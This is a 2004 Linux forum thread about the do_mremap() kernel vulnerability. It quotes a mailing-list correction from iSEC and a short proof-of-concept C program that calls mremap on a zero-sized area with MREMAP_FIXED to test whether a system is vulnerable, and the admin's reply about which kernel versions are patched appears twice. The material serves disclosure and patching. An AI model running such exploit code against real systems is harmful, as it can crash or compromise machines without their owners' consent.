take a look at this
http://www.infoworld.com/article/04/01/ ... ole_1.html
thats strange. two flaws in the kernel!!! I thought they changed the VM in 2.6 series???
Regards
Zaeem
Critical Kernel vulnerability
-
- Lieutenant Colonel
- Posts: 660
- Joined: Sat Jul 06, 2002 12:35 pm
- Location: Islamabad
- Contact:
-
- Site Admin
- Posts: 5132
- Joined: Fri May 02, 2003 10:24 am
- Location: Karachi
- Contact:
Re: Critical Kernel vulnerability
Dear Zaeemarshad,
Salam,
It is, but not in 2.6.1-rc1. From http://isec.pl/vulnerabilities/isec-0013-mremap.txt: And from http://kernel.org/pub/linux/kernel/v2.6 ... -2.6.1-rc2
Don't allow mremap of zero-sized areas. The do_mremap() vulnerability is fixed in the 2.6 kernel only in 2.6.1-rc2, where as you tested on 2.6.1-rc1. The latest version of the 2.2 kernel is 2.2.25, but there was no immediate changelog available. However, it was created on January 3 so I suspect it would have the patch?
Best Regards.
Salam,
zaeemarshad wrote:take a look at this
http://www.infoworld.com/article/04/01/ ... ole_1.html
thats strange. two flaws in the kernel!!! I thought they changed the VM in 2.6 series???
Date: Tue, 6 Jan 2004 17:30:35 +0100 (CET)
From: "Paul Starzetz" <ihaquer@isec.pl> Add to Address Book
To: vulnwatch@vulnwatch.org, full-disclosure@lists.netsys.com, bugtraq@securityfocus.com
Subject: Linux mremap bug correction
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Hi,
our initial posting contains a mistake about the vulnerability of the
2.2
kernel series. Since the 2.2 kernel series doesn't support the
MREMAP_FIXED flag it is NOT vulnerable. The source states
"MREMAP_FIXED option added 5-Dec-1999" but it didn't make into recent
2.2.x. We apologize for inconvenience.
- --
Paul Starzetz
iSEC Security Research
http://isec.pl/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.7 (GNU/Linux)
iD8DBQE/+uKwC+8U3Z5wpu4RAqd0AJ4m0jn+BBYuxgZC3ZDRgwl4u7MsNACeNzGB
4DstLw+HNr703e19zrA3cjg=
=5S9B
-----END PGP SIGNATURE-----
Date: Mon, 5 Jan 2004 22:22:39 +0100
From: "Christophe Devine" <devine@iie.cnam.fr> Add to Address Book
To: full-disclosure@lists.netsys.com, bugtraq@securityfocus.com
Subject: Linux kernel do_mremap() proof-of-concept exploit code
The following program can be used to test if a x86 Linux system
is vulnerable to the do_mremap() exploit; use at your own risk.
Code: Select all
$ cat mremap_poc.c
/*
* Proof-of-concept exploit code for do_mremap()
*
* Copyright (C) 2004 Christophe Devine and Julien Tinnes
*
* This program is free software; you can redistribute it and/or
modify
* it under the terms of the GNU General Public License as published
by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA
02111-1307 USA
*/
#include <asm/unistd.h>
#include <sys/mman.h>
#include <unistd.h>
#include <errno.h>
#define MREMAP_MAYMOVE 1
#define MREMAP_FIXED 2
#define __NR_real_mremap __NR_mremap
static inline _syscall5( void *, real_mremap, void *, old_address,
size_t, old_size, size_t, new_size,
unsigned long, flags, void *, new_address );
int main( void )
{
void *base;
base = mmap( NULL, 8192, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, 0, 0 );
real_mremap( base, 0, 0, MREMAP_MAYMOVE | MREMAP_FIXED,
(void *) 0xC0000000 );
fork();
return( 0 );
}
Don't allow mremap of zero-sized areas. The do_mremap() vulnerability is fixed in the 2.6 kernel only in 2.6.1-rc2, where as you tested on 2.6.1-rc1. The latest version of the 2.2 kernel is 2.2.25, but there was no immediate changelog available. However, it was created on January 3 so I suspect it would have the patch?
Best Regards.
Farrukh Ahmed